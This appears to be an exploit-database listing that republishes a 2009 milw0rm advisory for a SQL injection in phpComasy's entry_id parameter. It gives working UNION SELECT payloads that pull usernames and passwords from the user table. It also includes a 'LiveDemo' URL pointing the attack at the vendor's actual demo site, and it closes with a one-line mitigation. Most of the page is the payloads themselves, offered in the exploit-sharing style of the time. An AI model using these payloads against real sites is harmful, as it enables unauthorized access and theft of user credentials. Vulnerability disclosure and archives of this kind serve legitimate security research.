header-logo
Suggest Exploit
vendor:
phpComasy
by:
boom3rang
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: phpComasy
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpComasy(entry_id) SQL-injection Vulnerability

An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter entry_id. An example of such a query is -9999+union+all+select+1,concat(username,char(58),password),3,4+from+user-- or -9999+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,0,11,12,13,14+from+user--&mod_action=detail. This query will allow the attacker to view the username and password of the users in the database.

Mitigation:

Input validation should be used to prevent malicious SQL queries from being sent to the vulnerable parameter entry_id.
Source

Exploit-DB raw data:

###################################################
phpComasy(entry_id) SQL-injection Vulnerability
###################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de
#[~] Vulnerability :  SQL injection 
#[~] Google Dork   :  N/W
--------------------------------------------------
#[!] Name          :  phpComasy   
#[!] Site          :  www.phpcomasy.com
#[!] Download      :  http://www.phpcomasy.com/index.php?id=7&mod_action=project_detail&mod_project_id=9
###################################################


[-] Example: 
http://localhost/Path/?id=22&entry_id=[SQL-injection]

[-] Exploit:
-9999+union+all+select+1,concat(username,char(58),password),3,4+from+user--
or
-9999+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,0,11,12,13,14+from+user--&mod_action=detail

LiveDemo:
http://demo.phpcomasy.com/?id=22&entry_id=-9999+union+all+select+1,concat(username,char(58),password),3,4+from+user--&mod_action=detail

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2009-03-16]

Navigation

Suggest Exploit

Services By CQR